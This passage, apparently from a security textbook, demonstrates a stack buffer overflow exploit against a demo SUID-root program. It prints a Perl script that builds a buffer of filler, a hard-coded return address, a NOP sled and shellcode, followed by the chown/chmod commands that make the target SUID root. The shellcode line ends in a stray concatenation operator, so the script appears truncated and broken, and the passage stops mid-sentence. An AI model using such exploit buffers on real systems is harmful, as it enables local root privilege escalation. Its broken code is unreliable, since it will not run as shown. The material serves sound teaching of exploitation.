Putting It All Together: Exploiting a Program

All the elements of our exploit buffer are in place: the filler, the new EIP the program will return to, the NOP sled, and our shellcode. It’s time to try it out from the command line outside the debugger. Here is a Perl script that generates an exploit buffer using the previously discussed values. Note that the pack( ) function handles the little-endian conversion:

# File: exploit_buffer.pl
my $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".
my $return = 0xbfff8f60;
print "A"x28 . pack('V',$return) . "\x90"x1024 . $shellcode;

The chown and chmod commands are used to set up our example program as a set user ID (SUID) application. These commands cause the program to be executed at the root user’s privilege level. This is done to demonstrate the effect of an exploited SUID root program in the wild.

$ su
# chown root:root ./vuln
# chmod +s ./vuln
# exit
$ ls -la vuln
-rwsrwsr-x    1 root     root         5817 Jan 24 05:50 vuln

Now, for the actual exploitation of the program; use the ` (backtick) character to execute the Perl script that generates our exploit buffer. This buffer becomes the first argument to our vulnerable program. As previously mentioned, the overflowed program overwrites the sEIP address to our new return value which should point into our NOP ...

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